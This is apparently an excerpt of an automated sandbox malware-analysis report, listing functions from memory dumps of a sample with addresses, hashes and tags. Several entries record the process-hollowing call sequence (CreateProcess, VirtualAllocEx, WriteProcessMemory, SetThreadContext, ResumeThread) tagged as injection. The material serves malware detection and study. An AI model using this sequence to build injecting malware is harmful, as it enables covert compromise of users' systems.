                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049603049.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_61c0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 6db88b2a0d959be4cce3a8f40dd86718190a804e225739a3c241731d78326dca
                                                                      • Instruction ID: 688d23e62236a2c77a26e4a3df8d812e72e5f6d540acf80b100c8fbeb13e467a
                                                                      • Opcode Fuzzy Hash: 6db88b2a0d959be4cce3a8f40dd86718190a804e225739a3c241731d78326dca
                                                                      • Instruction Fuzzy Hash: D8C12370D002198FDF64CFA8CC91BEEBBB1BB59310F0095A9E859B7240DB749A85CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 061C5C58 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 061C5D2B
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049603049.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_61c0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      • API String ID: 3559483778-0
                                                                      • Opcode ID: 23d5b9241c6a794888a2823359fabc20c8ee9486e920431134676ca058570a04
                                                                      • Instruction ID: 4866c4df321333b066e911f7cac8118e08bc5cd94860be82ecd4e5ae1e04f78f
                                                                      • Opcode Fuzzy Hash: 23d5b9241c6a794888a2823359fabc20c8ee9486e920431134676ca058570a04
                                                                      • Instruction Fuzzy Hash: F441ABB5D012589FCF00CFA9D984AEEFBF5BB59310F24942AE418B7210D738AA55CF64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 061C5C51 Relevance: 1.6, APIs: 1, Instructions: 115injectionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 061C5D2B
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049603049.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_61c0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      • API String ID: 3559483778-0
                                                                      • Opcode ID: c2be5f1327d17336d7261b46a19b4d70091c51fa47228235da12d72e2667b2f7
                                                                      • Instruction ID: 7d14bde95383a609a06089b0ce0755f19fdfe856aa4298ddd2aa71a046d54b0e
                                                                      • Opcode Fuzzy Hash: c2be5f1327d17336d7261b46a19b4d70091c51fa47228235da12d72e2667b2f7
                                                                      • Instruction Fuzzy Hash: 9241ABB5D012589FCF00CFA9D984AEEFBF1BB59310F24942AE418B7210D338AA55CF54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 061C5DA8 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 061C5E62
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049603049.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_61c0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead
                                                                      • String ID:
                                                                      • API String ID: 1726664587-0
                                                                      • Opcode ID: 6638a687415a5e68342c70dd6f16bc7b0907154bae52098078e05d6b7f658d67
                                                                      • Instruction ID: c899c12af5acb710e79dc5252414a0c7f881e2f0e92510c06b28c770e26c893d
                                                                      • Opcode Fuzzy Hash: 6638a687415a5e68342c70dd6f16bc7b0907154bae52098078e05d6b7f658d67
                                                                      • Instruction Fuzzy Hash: 5441AAB5D00258DFCF10CFAAD984AEEFBB5BB59320F14942AE815B7200D734A945CF64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 061C5DB0 Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 061C5E62
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049603049.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_61c0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead
                                                                      • String ID:
                                                                      • API String ID: 1726664587-0
                                                                      • Opcode ID: 8ee726d428a3539ea32a9437c04363db45c4de79a876a0c65188a9379c5c8eb3
                                                                      • Instruction ID: c8b6295364397efb55b5609878806233926ec7730ce66a6556c8a4730a27d7be
                                                                      • Opcode Fuzzy Hash: 8ee726d428a3539ea32a9437c04363db45c4de79a876a0c65188a9379c5c8eb3
                                                                      • Instruction Fuzzy Hash: CC41A9B5D00258DFCF10CFAAD984AEEFBB5BB59320F14942AE814B7200D734A945CF68
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 061C5B38 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 061C5BE2
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049603049.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_61c0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 6eaa8e6593147d7dec2a4a039faf3eb304bf879d47c72d5190fd5604db4b51a2
                                                                      • Instruction ID: f307f3d324ee7be3876938c93a2601cc1184268fb9478adf97a7669c8c6faff9
                                                                      • Opcode Fuzzy Hash: 6eaa8e6593147d7dec2a4a039faf3eb304bf879d47c72d5190fd5604db4b51a2
                                                                      • Instruction Fuzzy Hash: 6C31A7B8D002489FCF10CFA9D980ADEFBB5BB59320F10A42AE814B7310D735A945CF68
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 061C5B31 Relevance: 1.6, APIs: 1, Instructions: 100memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 061C5BE2
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049603049.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_61c0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 78779b4161f3c8e9c19834c970dc35c8a46b3b6fa3e2b21025257ffb3aedfd03
                                                                      • Instruction ID: 1f71ea7e9b5c873a4d371412628175fb6c69b82729361470979b9290323d5845
                                                                      • Opcode Fuzzy Hash: 78779b4161f3c8e9c19834c970dc35c8a46b3b6fa3e2b21025257ffb3aedfd03
                                                                      • Instruction Fuzzy Hash: 9E31A8B9D002489FCF10CFA9D980ADEFBB5BF59320F14A42AE814B7210C735A955CF58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 061C5A10 Relevance: 1.6, APIs: 1, Instructions: 94threadinjectionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetThreadContext.KERNELBASE(?,?), ref: 061C5ABF
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049603049.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_61c0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: ContextThread
                                                                      • String ID:
                                                                      • API String ID: 1591575202-0
                                                                      • Opcode ID: d10e95dc1e749a7299107ddfbbf77d745df317a804b6f1bc7afcb0fa7959f4e4
                                                                      • Instruction ID: 7394dadfa75b083b2f29ac4c4b936f640518e166c9d045d1c328e5c4a4372564
                                                                      • Opcode Fuzzy Hash: d10e95dc1e749a7299107ddfbbf77d745df317a804b6f1bc7afcb0fa7959f4e4
                                                                      • Instruction Fuzzy Hash: E531CEB4D002589FCB14CFAAD984AEEFBF5BF58320F24842AE414B7210C738A945CF64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 061C5A08 Relevance: 1.6, APIs: 1, Instructions: 94threadinjectionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetThreadContext.KERNELBASE(?,?), ref: 061C5ABF
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049603049.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_61c0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: ContextThread
                                                                      • String ID:
                                                                      • API String ID: 1591575202-0
                                                                      • Opcode ID: 0eb4252ec77dda2cd4357e0538238b4f603719a9eee5b518fb925ad233078e3e
                                                                      • Instruction ID: 68494cc66bc4424b3da667141818776eb3f00dc99fc16aa2291faa3f2e3f8be6
                                                                      • Opcode Fuzzy Hash: 0eb4252ec77dda2cd4357e0538238b4f603719a9eee5b518fb925ad233078e3e
                                                                      • Instruction Fuzzy Hash: 2641CDB5D012589FCB14CFA9D984AEEFBF1BF58320F24842AE414B7210C738A985CF64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0B7140 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 6F0D2820: _malloc.LIBCMT ref: 6F0D2871
                                                                      • std::tr1::_Xweak.LIBCPMT ref: 6F0B71D2
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Xweak_mallocstd::tr1::_
                                                                      • String ID:
                                                                      • API String ID: 4085767713-0
                                                                      • Opcode ID: b01b6d6441c63f92d0389fe1c3305e9f644b3eea954a82e4849e7f6e75f91072
                                                                      • Instruction ID: b4e8832bbe478208ec0c7b99cfcd0d024a829c1b98589ca417439ac886b6fec4
                                                                      • Opcode Fuzzy Hash: b01b6d6441c63f92d0389fe1c3305e9f644b3eea954a82e4849e7f6e75f91072
                                                                      • Instruction Fuzzy Hash: 09315EB4A0474A9FCB10CFA9C890BAAB7F5FF49314B108A5DE8159B781D731B905CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0156B16B Relevance: 1.6, APIs: 1, Instructions: 79libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryW.KERNELBASE(?), ref: 0156B20A
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1048355079.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_1560000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: 10b35293b833e577c8dec9347060dd38788799d9468f2e44190e3b42b44a09b2
                                                                      • Instruction ID: f8d42da2562acfd795fcf4ae332aeadf06fb5e057d2bcfb3575ba64758ab914e
                                                                      • Opcode Fuzzy Hash: 10b35293b833e577c8dec9347060dd38788799d9468f2e44190e3b42b44a09b2
                                                                      • Instruction Fuzzy Hash: E7317AB5D002489FCB14CFA9D984ADEFBF5BB49310F14906AE818B7320D774A945CFA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0156B170 Relevance: 1.6, APIs: 1, Instructions: 78libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryW.KERNELBASE(?), ref: 0156B20A
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1048355079.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_1560000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: 6147e28e49c8df3328194051a2ef5652324a5250eed6d7e6c9b641a6561f28bf
                                                                      • Instruction ID: bf8b1c3ebec391b49a06e095d048c5d22691fd7c86e4ef472558c9533784c41b
                                                                      • Opcode Fuzzy Hash: 6147e28e49c8df3328194051a2ef5652324a5250eed6d7e6c9b641a6561f28bf
                                                                      • Instruction Fuzzy Hash: 863178B4D002489FCB14CFAAD984ADEFBF5BB49310F14906AE818B7320D774A945CFA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 061C5918 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ResumeThread.KERNELBASE(?), ref: 061C599E
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049603049.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_61c0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      • Opcode ID: 8862f663d0aa3ac1f8edd09bd7fead166d23ffc5bad667594aee74fade3ee2b5
                                                                      • Instruction ID: 231251f8fe4510da3997c8f89b0487c65812faccff3e536434c18f7a458a8b53
                                                                      • Opcode Fuzzy Hash: 8862f663d0aa3ac1f8edd09bd7fead166d23ffc5bad667594aee74fade3ee2b5
                                                                      • Instruction Fuzzy Hash: 9631CCB4D012489FCF14CFA9E580AEEFBB5AF58320F14946AE855B7300C734A945CF64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 061C5920 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ResumeThread.KERNELBASE(?), ref: 061C599E
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049603049.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_61c0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      • Opcode ID: e3c1552a570e5b16bf4a3ba9866084f5fce1388f52a45e06dcf83578b1d9740d
                                                                      • Instruction ID: 06be423ff846b22068828fc4842d72e5802b8c6aa3b1298df738f3e81bbd3869
                                                                      • Opcode Fuzzy Hash: e3c1552a570e5b16bf4a3ba9866084f5fce1388f52a45e06dcf83578b1d9740d
                                                                      • Instruction Fuzzy Hash: 2031BDB4D012589FCF14CFA9D984A9EFBB5BF98320F14942AE815B7300C774A941CFA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F1125C3 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6F10CB3E,6F109BD4,?,00000000,00000000,00000000,?,6F10EA98,00000001,00000214), ref: 6F112606
                                                                        • Part of subcall function 6F10D7D8: __getptd_noexit.LIBCMT ref: 6F10D7D8
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap__getptd_noexit
                                                                      • String ID:
                                                                      • API String ID: 328603210-0
                                                                      • Opcode ID: df392e92ea758c8d1575da7ff1f98cafab2783bcb3af16da27192b4e67a1e38e
                                                                      • Instruction ID: c85e161e7e72fce1cb0e38317e5a5da3ba81399c355c315c4b6afdf2d210635f
                                                                      • Opcode Fuzzy Hash: df392e92ea758c8d1575da7ff1f98cafab2783bcb3af16da27192b4e67a1e38e
                                                                      • Instruction Fuzzy Hash: 5F01B1312092959BEB14DF35CC64F9A33A5BFA37E0F10453AAC298B1D0DB30E430CA50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0CEA40 Relevance: 1.5, APIs: 1, Instructions: 47memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 6F109BB5: _malloc.LIBCMT ref: 6F109BCF
                                                                      • SysAllocString.OLEAUT32 ref: 6F0CEA8D
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: AllocString_malloc
                                                                      • String ID:
                                                                      • API String ID: 959018026-0
                                                                      • Opcode ID: 1a58650c7a3120c0355b3100b4b0bf71b2e94dfaf135c9e51e4ad82de67331cc
                                                                      • Instruction ID: 2dac735438d332afaf43c8eec1cb63376e0954a756fc73fde4406ea2e01e2000
                                                                      • Opcode Fuzzy Hash: 1a58650c7a3120c0355b3100b4b0bf71b2e94dfaf135c9e51e4ad82de67331cc
                                                                      • Instruction Fuzzy Hash: 20018071804B55EFE311CF98C901B9AB7E8FB05B64F10432AE815A7380D7B5A910CAD1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0D3160 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: _memset
                                                                      • String ID:
                                                                      • API String ID: 2102423945-0
                                                                      • Opcode ID: 6080e03f66cf4956a255a5ac890dd67e7cf4e1a4c2a5f1178bf3c49ed0b50dda
                                                                      • Instruction ID: 7028e7ddf8914aeb1eae306a7965e95f4b79e910a1b9edb3c67867a513e70495
                                                                      • Opcode Fuzzy Hash: 6080e03f66cf4956a255a5ac890dd67e7cf4e1a4c2a5f1178bf3c49ed0b50dda
                                                                      • Instruction Fuzzy Hash: 66F04F75A012086BDB04EB94DD56FAEB3BDEF88300F008159FD055B340DA31AD16C7A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F109D21 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3_catch.LIBCMT ref: 6F10E8DC
                                                                        • Part of subcall function 6F109BB5: _malloc.LIBCMT ref: 6F109BCF
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog3_catch_malloc
                                                                      • String ID:
                                                                      • API String ID: 529455676-0
                                                                      • Opcode ID: 925da9cdf525ff1ea6a04ac6fe0d53c50aa671e4f88ddfcbed24ad2d57b031fe
                                                                      • Instruction ID: 9f0c2933c9c5744f1fa33b1fd39d16200abffb7929e26a233cc81bfcd383fe3d
                                                                      • Opcode Fuzzy Hash: 925da9cdf525ff1ea6a04ac6fe0d53c50aa671e4f88ddfcbed24ad2d57b031fe
                                                                      • Instruction Fuzzy Hash: 10D05E3151830DA7CB51FBA9C505F6D7BA0AB413E5F900065F0087A2C0DE726E208BA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F109AB8 Relevance: 1.5, APIs: 1, Instructions: 14COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 6F10D291: __lock.LIBCMT ref: 6F10D293
                                                                      • __onexit_nolock.LIBCMT ref: 6F109AD0
                                                                        • Part of subcall function 6F1099D1: RtlDecodePointer.NTDLL(6F14B974,6F124230,00000000,?,?,6F109AD5,6F0B51E0,6F139540,0000000C,6F109B01,6F0B51E0,?,6F109C19,6F1236BB,6F0B51E0), ref: 6F1099E6
                                                                        • Part of subcall function 6F1099D1: DecodePointer.KERNEL32(?,?,6F109AD5,6F0B51E0,6F139540,0000000C,6F109B01,6F0B51E0,?,6F109C19,6F1236BB,6F0B51E0), ref: 6F1099F3
                                                                        • Part of subcall function 6F1099D1: __realloc_crt.LIBCMT ref: 6F109A30
                                                                        • Part of subcall function 6F1099D1: __realloc_crt.LIBCMT ref: 6F109A46
                                                                        • Part of subcall function 6F1099D1: EncodePointer.KERNEL32(00000000,?,?,6F109AD5,6F0B51E0,6F139540,0000000C,6F109B01,6F0B51E0,?,6F109C19,6F1236BB,6F0B51E0), ref: 6F109A58
                                                                        • Part of subcall function 6F1099D1: EncodePointer.KERNEL32(6F0B51E0,?,?,6F109AD5,6F0B51E0,6F139540,0000000C,6F109B01,6F0B51E0,?,6F109C19,6F1236BB,6F0B51E0), ref: 6F109A6C
                                                                        • Part of subcall function 6F1099D1: EncodePointer.KERNEL32(-00000004,?,?,6F109AD5,6F0B51E0,6F139540,0000000C,6F109B01,6F0B51E0,?,6F109C19,6F1236BB,6F0B51E0), ref: 6F109A74
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Pointer$Encode$Decode__realloc_crt$__lock__onexit_nolock
                                                                      • String ID:
                                                                      • API String ID: 3536590627-0
                                                                      • Opcode ID: 337dab79c5a2196e3375339ab159099b615490b3b98113a3ab041dbd079cea32
                                                                      • Instruction ID: cac27e1ac3f269db7303c750787f295e6e41a20b958e432c20e56a51e203bf56
